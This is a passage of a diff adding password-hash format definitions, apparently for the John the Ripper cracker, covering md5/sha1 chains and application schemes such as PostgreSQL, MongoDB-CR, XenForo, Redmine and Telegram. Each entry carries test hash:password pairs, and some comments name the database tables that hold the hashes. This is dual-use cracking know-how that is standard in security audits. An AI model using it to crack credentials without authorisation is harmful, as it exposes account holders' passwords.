+Func=DynamicFunc__append_keys
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+# PrestaShop uses long salts, $s == _COOKIE_KEY_ (config/settings.inc.php file)
+# PrestaShop hashes can be extracted from the "ps_employee" table ("ps_" is the default table prefix)
+# PrestaShop 1.6.0.9 was used for testing this!
+# Update: PrestaShop 1.7.x.y doesn't make use of the config/settings.inc.php
+# file. It uses bcrypt hashing, and the hashes are stored in the ps_customer
+# table.
+#
+# This hash format is also used by RADIUS Responses when salts are > 16 bytes long.
+Test=$dynamic_1017$2b3f4811983db00560dfd4c28f67bc5a$B3DdR7ZVi2N26aVbR84bjSAHht8JYhqcDr1FK49jiQXFU8Vo66PKmAFt:lemons12345
+
+[List.Generic:dynamic_1018]
+Expression=md5(sha1(sha1($p)))
+Flag=MGF_StartInX86Mode
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1018$a93dcf04edd0e2b98c1165304c250b80:1234abcd
+Test=$dynamic_1018$f3b5f01810c4d66ae0af85b3789e12cd:potato
+TestM=$dynamic_1018$5c43d21a3dfb81435d45e78334fa6109:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1018$073c8ec8e73fdedb7aad9df4ded29ba3:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1019]
+Expression=md5(sha1(sha1(md5($p))))
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__SSEtoX86_switch_output1
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1019$86f607194f0aefe63a6c13723e94382d:jjaammaaiiccaa
+Test=$dynamic_1019$77faf9282c0c9b5870a4d9c3ec484aca:blink182
+TestM=$dynamic_1019$bc679e2715c335fcf8b9205efd031521:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1019$36966d66615d3c0de89ca53ed88212ec:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1020]
+Expression=md5(sha1(md5($p)))
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__SSEtoX86_switch_output1
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1020$2a8ce40b837c8550506d9b5d220bac28:0124
+TestM=$dynamic_1020$74102b324b8b1cf909263284a53955aa:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1020$e4ad9c1e34bad775d2cd399294c286e8:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1021]
+Expression=md5(sha1(md5(sha1($p))))
+Flag=MGF_StartInX86Mode
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__SSEtoX86_switch_output2
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1021$c1e054140feac1b411d3efc8bae5b881:norway
+TestM=$dynamic_1021$dbf8fc7a96898e16e1251d94b3bb06d9:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1021$df38670077cb4c299bcaf06e8271c986:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1022]
+Expression=md5(sha1(md5(sha1(md5($p)))))
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__SSEtoX86_switch_output1
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__SSEtoX86_switch_output2
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1022$9caf8c249c588a89030db581ec6cea47:313131
+Test=$dynamic_1022$e1eb34c6ab9e9cbe4ff67fdeb747e169:8616
+TestM=$dynamic_1022$d4d51c756abefb41bafbcff7c6237618:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1022$9367b878de004be863000174e728c15f:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1023]
+Expression=sha1($p) (hash truncated to length 32)
+Flag=MGF_KEYS_INPUT
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_POOR_OMP
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1023$5baa61e4c9b93f3f0682250b6cf8331b:password
+Test=$dynamic_1023$e4227954acdafb57977d7dc8a1957095:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1024]
+Expression=sha1(md5($p)) (hash truncated to length 32)
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__SSEtoX86_switch_output1
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1024$c56289182ffd862d906eac1ce5c6fe6d:trigun
+TestM=$dynamic_1024$e290c79e9584e4cd61faded848ff96f0:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1024$609fed73c093edfbcc9913004656f360:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1025]
+Expression=sha1(md5(md5($p))) (hash truncated to length 32)
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__SSEtoX86_switch_output2
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1025$f122db007ed655921f98184e4302bba8:123456
+TestM=$dynamic_1025$006d246968ee9e761578bce26d5a82a2:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1025$cc98637054045e998ab01e97ce65585e:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1026]
+Expression=sha1(sha1($p)) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__SHA1_crypt_input1_overwrite_input2
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1026$71b37a2d9b0a7d5dc4da8a08d9092817:peanuts
+Test=$dynamic_1026$30f8cf133eaac8e3b6af4bcba722921d:peanut
+Test=$dynamic_1026$809df50e02b68a389a8f6639a03421eb:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1027]
+Expression=sha1(sha1(sha1($p))) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__SHA1_crypt_input1_overwrite_input2
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1027$b8443c12b3066dac22b3857b2fb779b4:leelee
+Test=$dynamic_1027$00aeb6dc5e6269a6b2f39728cd8a6812:test1
+Test=$dynamic_1027$54e45916fb79f7be1c695828fdba4491:test3
+Test=$dynamic_1027$d08a9796dc4ea6decf59ce43caa1b4b4:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1028]
+Expression=sha1(sha1_raw($p)) (hash truncated to length 32)
+# currently, the raw sha1 does not work in SSE code.  It does work on 'flat' x86 code
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__LargeHash_OUTMode_raw
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1028$79239e0207cd5f6a472c8795c73b451d:rainbow
+Test=$dynamic_1028$06c0bf5b64ece2f648b5f048a7190390:test1
+Test=$dynamic_1028$f357e78cabad76fd3f1018ef85d78499:test3
+Test=$dynamic_1028$64ad70ca481a2c33a2c843cc03555365:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1029]
+Expression=sha256($p) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1029$e4ad93ca07acb8d908a3aa41e920ea4f:iloveyou
+Test=$dynamic_1029$13b1f7ec5beaefc781e43a3b344371cd:freedom
+Test=$dynamic_1029$aa97302150fce811425cd84537028a5a:computer
+Test=$dynamic_1029$75ff6bea5b0ad25171988e435c24b3ee:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1030]
+Expression=whirlpool($p) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__WHIRLPOOL_crypt_input1_to_output1_FINAL
+Test=$dynamic_1030$56fd4ecb153a08b65a73b51e3c8ca369:spiral
+Test=$dynamic_1030$6b116ef0c32185d3ae1136f4593a5cae:defender
+Test=$dynamic_1030$fee8605795f28dda386324d59a28ba99:amazon
+Test=$dynamic_1030$73622582350099f45647970c0a8a2496:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1031]
+Expression=gost($p) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__GOST_crypt_input1_to_output1_FINAL
+Test=$dynamic_1031$0e8cd409a23c2e7ad1c5b22b101dfa16:admin
+Test=$dynamic_1031$3b024be97641061bdd5409b4866c26c5:test1
+Test=$dynamic_1031$55719211936152fbe2e1f6aa796fa866:test3
+Test=$dynamic_1031$096dd6ff632727d682070752fbda548e:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1032]
+Expression=sha1_64(utf16($p)) (PeopleSoft)
+Flag=MGF_INPBASE64m
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_UTF8
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1032$6Pl/upEE0epQR5SObftn+s2fW3M=:password
+
+[List.Generic:dynamic_1033]
+Expression=sha1_64(utf16($p).$s)
+Flag=MGF_INPBASE64m
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_SALTED
+Flag=MGF_UTF8
+SaltLen=-32
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__setmode_normal
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+# we want to make SURE that something ending with = mixed
+# with others NOT ending with = are handled properly.
+Test=$dynamic_1033$D7C1gHanUq1xE96HpEQitzAhNB8$FyKXs6zU:password
+Test=$dynamic_1033$sh+Q50Cp4vERzDkJcaaKIv8zubM=$M1RxMCTZ:password2
+Test=$dynamic_1033$DfM7ryjrNamyG0wRS6CwheZS6Mo$3swBL4qn:
+
+####################################################################
+# Dynamic type for md5($p.$u) for PostgreSQL stored MD5 hashes
+# See also dynamic_1015 for PostgreSQL 'pass the hash' (with salt)
+####################################################################
+[List.Generic:dynamic_1034]
+Expression=md5($p.$u) (PostgreSQL MD5)
+Flag=MGF_USERNAME
+SaltLen=-32
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1034$bd6fd49a627ecdbe4031b2d52d5748ab:openwall:postgres
+Test=$dynamic_1034$32e12f215ba27cb750c9e093ce4b5127:password:postgres
+
+[List.Generic:dynamic_1300]
+MaxInputLen=55
+MaxInputLenX86=110
+Flag=MGF_POOR_OMP
+Expression=md5(md5_raw($p))
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+# changed these 3 lines to the 4 lines that follow. This format has had problems
+# in certain builds (like generic). Likely it is the set_input_len_16 causing
+# issues and should be looked at. For now, the new method using input2 works fine.
+#Func=DynamicFunc__crypt_md5_to_input_raw
+#Func=DynamicFunc__set_input_len_16
+#Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append2_from_last_output1_as_raw
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1300$43442676c74ae59f219c2d87fd6bad52:admin
+Test=$dynamic_1300$5cbaca32e76bb49ca69657a9145d77ee:test1
+Test=$dynamic_1300$1c8b12da6f307bbfe8d245c79d468b3d:test3
+TestM=$dynamic_1300$60f3fd93d4e949d871dc7713664b2b4e:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1300$d66e6e66ff4a8dc6f3665740268fe1bc:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1350]
+Expression=md5(md5($s.$p):$s)
+# Flag needed here, is Salt.
+CONST1=:
+Flag=MGF_SALTED
+SaltLen=2
+MaxInputLen=53
+MaxInputLenX86=108
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_from_last_output_as_base16
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1350$c1f58952ab714b5ef76926628f6e0b16$92:blondie
+Test=$dynamic_1350$a130dbe6709653d602eec70945e14f87$9e:blondie
+TestM=$dynamic_1350$0f7dcf84c95a3c191a4bff15c62058a0$12:12345678901234567890123456789012345678901234567890123
+TestF=$dynamic_1350$f78bdbc1c68b64f52c40d777068309fb$12:123456789012345678901234567890123456789012345678901234567890123456789012345678
+
+# Thanks to JimF for his help in making this format work
+# (Jean-Michel Picod)
+[List.Generic:dynamic_1400]
+Expression=sha1(utf16($p)) (Microsoft CREDHIST)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_StartInX86Mode
+Flag=MGF_POOR_OMP
+Flag=MGF_UTF8
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+#Test=$dynamic_1500$e8f97fba9104d1ea5047948e6dfb67fa:password
+Test=$dynamic_1400$e8f97fba9104d1ea5047948e6dfb67facd9f5b73:password
+
+# Thanks JimF for his help making this format to work
+# (Jean-Michel Picod)
+[List.Generic:dynamic_1401]
+Expression=md5($u.\nskyper\n.$p) (Skype MD5)
+Flag=MGF_USERNAME
+Flag=MGF_StartInX86Mode
+Flag=MGF_INPUT_20_BYTE
+CONST1=\x0Askyper\x0A
+# 23 gives us ability to do user names up to 55-8-23 (or 24 byte user names)
+# this should be ported to a flat format.
+MaxInputLen=23
+MaxInputLenX86=110
+SaltLen=-24
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt
+# NOTE, I did not have full 40 byte hashes, but am using the INPUT_20_BYTE flag.
+# The last 8 0's are only used for valid to work, and so we can add full hashes
+# when we get them. Only the first 16 bytes is used in hash compare within JtR
+Test=$dynamic_1401$27f6a9d892475e6ce0391de8d2d893f700000000:password:username
+Test=$dynamic_1401$27f6a9d892475e6ce0391de8d2d893f700000000$$Uusername:password
+# repeat that hash in exactly the same form that is used in john.pot
+Test=$dynamic_1401$27f6a9d892475e6ce0391de8d2d893f700000000$HEX$2455757365726e616d65:password
+
+# In Redmine, the hashed password is stored in the following form,
+# SHA1(salt + SHA1(password))
+#
+# $ mysql -u root -p
+# mysql> use bitnami_redmine;
+# Database changed
+# mysql> select * from users
+[List.Generic:dynamic_1501]
+Expression=sha1($s.sha1($p)) (Redmine)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1_SHA1
+SaltLen=32
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_input2_from_input
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1501$dd49e260795cb71da6904b9bccec30cb79b189f5$21737e0ab18ae77caec21f73c6e60c8d:redminecrap
+Test=$dynamic_1501$713769f2b8824e8f5abc2d3e4f9326f32ff1d46b$5bfe6f1c0f7a8d802032d1bf85225400:redminefff
+
+# In XenForo, the hashed password is stored in the following form(s),
+# sha1(sha1(password).salt)
+#
+# OR
+#
+# sha256(sha256(password).salt)
+#   NOTE, added MGF_KEYS_BASE16_IN1_SHA1 and MGF_KEYS_BASE16_IN1_SHA256 flags
+#   and the many salts speed is now greatly improved.
+[List.Generic:dynamic_1502]
+Expression=sha1(sha1($p).$s) (XenForo SHA-1)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1_SHA1
+SaltLen=-120  // dont know, so made it big, jfoug
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__set_input_len_40
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1502$fd74fa6521e515921ad843a8465e34b703960db1$dummysalt:password
+
+# note this hash could use the pre-compute limb-1 optimization we are wanting to do.
+# that would take it from 3 sha256 limbs to 1 sha256 limb (in many salts). Right now,
+# we have reduced it from 3 limbs to 2 limbs (for many salts).
+[List.Generic:dynamic_1503]
+Expression=sha256(sha256($p).$s) (XenForo SHA-256)
+Flag=MGF_INPUT_32_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1_SHA256
+MaxInputLenX86=110
+SaltLen=-120  // dont know, so made it big, jfoug
+MaxInputLen=110
+Func=DynamicFunc__set_input_len_64
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1503$453f2e21fa6c150670d3ecf0e4a0ff3bab8b1903c2e96ad655d960b95f104248$697de9eda4a02563a7ec66d42d4a96995cb2948e29ab76fbcc89e8db71dd10f1:password
+Test=$dynamic_1503$a8a0e9545c1475e8546f8546d87fe2516cf525c12ad79a6a7a8fee2fb0d8afd3$697de9eda4a02563a7ec66d42d4a96995cb2948e29ab76fbcc89e8db71dd10f1:verlongcrappypassword01234567890
+
+# http://wiki.insidepro.com/index.php/sha1($a.$p.$s)
+[List.Generic:dynamic_1504]
+Expression=sha1($s.$p.$s)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+SaltLen=-68  // dont know, so made it max size that fits in 4 limb buffer, jfoug
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1504$114e4978430ee4fe2bc492f059f5c7aa400bf2fe$Salt:abcd
+Test=$dynamic_1504$aab04277ffba1dee47288b05fa58d25e49a1935e$Salt:12345678
+Test=$dynamic_1504$3b71a92fb2f4aeda9ae38211b67c5a4dc2a1771a$Salt:
+
+# md5($p.$s.md5($p.$s)) (saw it on https://hashcat.net/trac)
+[List.Generic:dynamic_1505]
+Expression=md5($p.$s.md5($p.$s))
+# to make flat (allows much longer passwords and salts)
+Flag=MGF_FLAT_BUFFERS
+MaxInputLen=110
+SaltLen=-64
+Flag=MGF_SALTED
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__append_keys2
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_1505$b8bbabb1eb9802a2e962de0207ca5172$aaaSXB:test1
+
+# https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/
+[List.Generic:dynamic_1506]
+Expression=md5($u.:XDB:.$p) (Oracle 12c "H" hash)
+Flag=MGF_USERNAME
+CONST1=:XDB:
+MaxInputLen=23
+MaxInputLenX86=110
+SaltLen=-27
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt
+Test=$dynamic_1506$dc9894a01797d91d92eca1da66242209:epsilon:DEMO
+
+# salt here is really a const.
+[List.Generic:dynamic_1507]
+Expression=sha1(utf16($const.$p)) (Mcafee master pass)
+CONST1=\x01\x0f\x0d\x33
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_INPUT_20_BYTE
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1507$d4eaf666d09316f9d61b14753353a73d5fbcf048:test
+Test=$dynamic_1507$9dbe0d0ea16ae0a14c0c81a7c962b5a16e777259:test1
+
+# Newer SunShop Shopping Cart. Older SunShop 4.1.0 uses md5($p) as the hashing
+# scheme. It seems that both these hash types can live together in a single
+# SunShop database.
+[List.Generic:dynamic_1518]
+Expression=md5(sha1($p).md5($p).sha1($p))
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input1_append_input2
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__MD5_crypt_input2_to_output1_FINAL
+Test=$dynamic_1518$c756b56aed8d6748ee63e1e270c71a3f:password
+Test=$dynamic_1518$8e6db6b58e9e326aba17e19a36c79d95:menura
+Test=$dynamic_1518$2abe0f6794cc57663527ce7ab81fdaf3:stealth
+Test=$dynamic_1518$08793c9ab17a586b3af71d28e1cae2c1:fletch
+Test=$dynamic_1518$b19d46258f6a00f151367024789d71f1:smurfs
+Test=$dynamic_1518$065c78f47a7da2e2ca2bd76eed10f6cd:ralphy1
+Test=$dynamic_1518$82f7dd8a757d1a79126817940336087d:Kitesurfing1
+
+# Telegram for Android hashes. Use ../run/telegram2john.py to extract the hashes.
+[List.Generic:dynamic_1528]
+Expression=sha256($s.$p.$s) (Telegram for Android)
+Flag=MGF_INPUT_32_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+SaltLen=16
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1528$dab5552484cc327bd6d23b2a1ceb55b6ffb30f305bc09962a9102a6cec63773c$HEX$9533cd79bf8739bdd47ff8998aaf578c:1234
+Test=$dynamic_1528$cad3fe1d4df2bf68c23f003e771c79fa42d10ae9a03671019d9c91a266a91372$HEX$901c3371d7de4b525b0e0a6abf4f392e:0987
+
+# DeepSound hashes. Use ../run/deepsound2john.py to extract the hashes.
+[List.Generic:dynamic_1529]
+Expression=sha1($p null_padded_to_len_32) (DeepSound)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_FLAT_BUFFERS
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__set_input_len_32
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1529$6f9fa2285514c73bcac858496361f19f477ee416:deep5ound
+Test=$dynamic_1529$66cad8923499423fa0c1d3974256d957840b9d69:iqlusion
+Test=$dynamic_1529$a3eb15172cc7e6090a2eb32e6dc8c3bd30c39a02:abcdefghijklmnopqrstuvwxyz012345
+
+# MONGODB-CR system hashes
+# Input hash format => username:$dynamic_1550$hash
+[List.Generic:dynamic_1550]
+Expression=md5($u.:mongo:.$p) (MONGODB-CR system hash)
+Flag=MGF_USERNAME
+CONST1=:mongo:
+MaxInputLen=23
+MaxInputLenX86=110
+# note, saltlen + length(:mongo:) + length(plain) must stay <= 55 for SIMD
+#   so 25+7+23 == 55
+SaltLen=-25
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt
+Test=$dynamic_1550$08f32db65f837a52cd791bd923a61e95$$Usomeadmin:secret
+Test=$dynamic_1550$819951ad797c3564148a77cbecf3b166$$Uadmin:secret@12345
+
+# MONGODB-CR network hashes  (user name < 8 bytes long)
+# Input hash format => username:$dynamic_1551$hash$salt$$Uusername
+[List.Generic:dynamic_1551]
+Expression=md5($s.$u.(md5($u.:mongo:.$p)) (MONGODB-CR network hash)
+Flag=MGF_USERNAME
+CONST1=:mongo:
+MaxInputLen=23
+MaxInputLenX86=110
+# note, saltlen + length(:mongo:) + length(plain) must stay <= 55 for SIMD
+#   so 25+7+23 == 55
+SaltLen=16
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_userid2
+Func=DynamicFunc__crypt
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1551$0c85e3f74adce5d037426791940c820a$58d3229c83e3f87e$$Usa:sa
+Test=$dynamic_1551$797d7e18879446845f10ae9d519960b2$10441db416a99ffc$$Usa:longpassword
+Test=$dynamic_1551$a5ca2c517c06fdfb773144d53fb26f56$9b90cf265f3194d7$$UHerman:123456789
+Test=$dynamic_1551$441d6ece7356c67dcc69dd26e7e0501f$be8fa52f0e64c250$$Usz110:passWOrd
+Test=$dynamic_1551$c95e106f1d9952c88044a0b21a6bd3fd$304b81adddfb4d6f$$Ujack:
+
+# MONGODB-CR network hashes  (user name >= 8 bytes long)
+# Input hash format => username:$dynamic_1552$hash$salt$$Uusername
+[List.Generic:dynamic_1552]
+Expression=md5($s.$u.(md5($u.:mongo:.$p)) (MONGODB-CR network hash)
+Flag=MGF_USERNAME
+Flag=MGF_FLAT_BUFFERS
+CONST1=:mongo:
+MaxInputLen=110
+MaxInputLenX86=110
+SaltLen=16
+Func=DynamicFunc__clean_input_kwik
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_userid
